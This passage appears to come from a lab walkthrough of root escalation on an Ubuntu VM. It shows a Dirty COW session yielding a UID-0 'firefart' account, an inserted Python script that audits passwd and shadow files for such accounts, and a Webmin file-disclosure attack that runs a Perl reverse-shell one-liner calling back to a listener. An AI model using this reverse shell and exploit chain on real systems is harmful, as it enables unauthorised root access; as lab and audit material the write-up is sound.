mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
vmware@ubuntuvm:/tmp$ su firefart
Password:
firefart@ubuntuvm:/tmp# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@ubuntuvm:/tmp# cd /root
firefart@ubuntuvm:~# ls
keys
firefart@ubuntuvm:~# cd keys
firefart@ubuntuvm:~/keys# ls
firefart@ubuntuvm:~/keys# ls -al
total 8
drwxr-xr-x 2 firefart root 4096 2008-06-12 13:18 .
drwxr-xr-x 4 firefart root 4096 2008-06-12 13:18 ..
firefart@ubuntuvm:~/keys#
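What an administrator auditing this host could check for, covering both the md5crypt hashes john loaded earlier and the UID-0 firefart entry that the Dirty COW run wrote into /etc/passwd (note the clobbered remnant line and the vanished root entry in the cat output above): an added account-file audit that is not part of this post. The sample files are constructed in the shape of the ones dumped here, with placeholder shadow hashes.

```python
import re

# Constructed sample files shaped like the ones dumped on this page. The firefart
# line and the truncated remnant under it mirror what Dirty COW left in /etc/passwd;
# the shadow hashes are placeholders, not the target's.
PASSWD = """\
firefart:fionu3giiS71.:0:0:pwned:/root:/bin/bash
/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
mysql:x:103:107:MySQL Server,,,:/var/lib/mysql:/bin/false
vmware:x:1000:1000:vmware,,,:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
guest:x:1004:1004::/home/guest:/bin/bash
"""
SHADOW = """\
root:$1$saltsalt$PLACEHOLDERmd5crypthash00:14041:0:99999:7:::
bin:*:14040:0:99999:7:::
www-data:*:14040:0:99999:7:::
mysql:!:14040:0:99999:7:::
vmware:$1$saltsalt$PLACEHOLDERmd5crypthash01:14042:0:99999:7:::
obama:$6$saltsalt$PLACEHOLDERsha512crypthash:14041:0:99999:7:::
guest::14041:0:99999:7:::
"""

# Schemes a wordlist run gets through quickly, as the md5crypt john session shows.
WEAK_SCHEMES = {"descrypt", "md5crypt"}
PREFIXES = {"$1$": "md5crypt", "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
            "$5$": "sha256crypt", "$6$": "sha512crypt", "$y$": "yescrypt"}


def hash_scheme(field: str) -> str:
    """Classify the password field of a passwd or shadow entry."""
    if field == "":
        return "empty"        # login with no password at all
    if field == "x":
        return "shadowed"     # real hash lives in /etc/shadow
    if field[0] in "*!":
        return "locked"
    for prefix, name in PREFIXES.items():
        if field.startswith(prefix):
            return name
    if re.fullmatch(r"[./0-9A-Za-z]{13}", field):
        return "descrypt"     # legacy DES crypt, like the generated firefart entry
    return "unknown"


def parse_colon_file(text: str, fields: int):
    """Split a passwd/shadow file into rows; count lines with the wrong field count."""
    rows, malformed = [], 0
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != fields:
            malformed += 1    # e.g. the tail of a line clobbered by an in-place write
            continue
        rows.append(parts)
    return rows, malformed


def audit_accounts(passwd_text: str, shadow_text: str) -> dict:
    """Return the findings an administrator would want from these two files."""
    passwd, bad_p = parse_colon_file(passwd_text, 7)
    shadow, bad_s = parse_colon_file(shadow_text, 9)
    shadow_hash = {r[0]: r[1] for r in shadow}
    passwd_names = {r[0] for r in passwd}
    f = {"extra_uid0": [], "hash_in_passwd": [], "empty_password": [],
         "weak_hash": [], "missing_shadow": [], "shadow_only": [],
         "malformed_lines": bad_p + bad_s}
    for name, pw, uid, *_ in passwd:
        scheme = hash_scheme(pw)
        if uid == "0" and name != "root":
            f["extra_uid0"].append(name)          # a second root-equivalent account
        if scheme == "empty":
            f["empty_password"].append(name)
        elif scheme == "shadowed":
            if name not in shadow_hash:
                f["missing_shadow"].append(name)
        elif scheme != "locked":
            f["hash_in_passwd"].append(name)      # hash readable by every local user
            if scheme in WEAK_SCHEMES:
                f["weak_hash"].append(name)
    for name, pw in shadow_hash.items():
        scheme = hash_scheme(pw)
        if scheme in WEAK_SCHEMES:
            f["weak_hash"].append(name)
        if scheme == "empty":
            f["empty_password"].append(name)
        if name not in passwd_names:
            f["shadow_only"].append(name)         # e.g. root's passwd line was overwritten
    return f


if __name__ == "__main__":
    for key, value in audit_accounts(PASSWD, SHADOW).items():
        print(f"{key:16} {value}")
```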

Privilege escalation 2

Exploiting the Webmin file disclosure vulnerability
We can also use the Webmin file disclosure vulnerability, because it executes and reads files as root. So we only need to upload a Perl reverse-shell script, have it run as root, and start a listener on Kali to catch the shell, and it comes back as root!

exp

┌──(root㉿ru)-[~/kali]
└─# cat shell.cgi 
perl -e 'use Socket;$i="192.168.16.128";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

┌──(root㉿ru)-[~/kali]
└─# python -m http.server 80  
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.16.140 - - [11/Dec/2023 09:48:05] "GET /shell.cgi HTTP/1.0" 200 -

vmware@ubuntuvm:/tmp$ wget http://192.168.16.128/shell.cgi
--13:28:44--  http://192.168.16.128/shell.cgi
           => `shell.cgi'
Connecting to 192.168.16.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 219 [application/octet-stream]

100%[====================================>] 219           --.--K/s

13:28:44 (70.65 MB/s) - `shell.cgi' saved [219/219]

vmware@ubuntuvm:/tmp$ ls
dirty  dirty.c  passwd.bak  shell.cgi  sqllS3Hev
vmware@ubuntuvm:/tmp$ chmod +x shell.cgi
vmware@ubuntuvm:/tmp$ ls
dirty  dirty.c  passwd.bak  shell.cgi  sqllS3Hev
vmware@ubuntuvm:/tmp$


┌──(root㉿ru)-[~/kali]
└─# perl 2017.pl 192.168.16.140 10000 /tmp/shell.cgi 0
WEBMIN EXPLOIT !!!!! coded by UmZ!
Comments and Suggestions are welcome at umz32.dll [at] gmail.com
Vulnerability disclose at securitydot.net
I am just coding it in perl 'cuz I hate PHP!
Attacking 192.168.16.140 on port 10000!
FILENAME:  /tmp/shell.cgi

┌──(root㉿ru)-[~/kali]
└─# nc -lvvp 1234
listening on [any] 1234 ...
192.168.16.140: inverse host lookup failed: Unknown host
connect to [192.168.16.128] from (UNKNOWN) [192.168.16.140] 35243
sh: can't access tty; job control turned off
# id
uid=0(firefart) gid=0(root)
# cd /root
# pwd
/root
# ls
keys

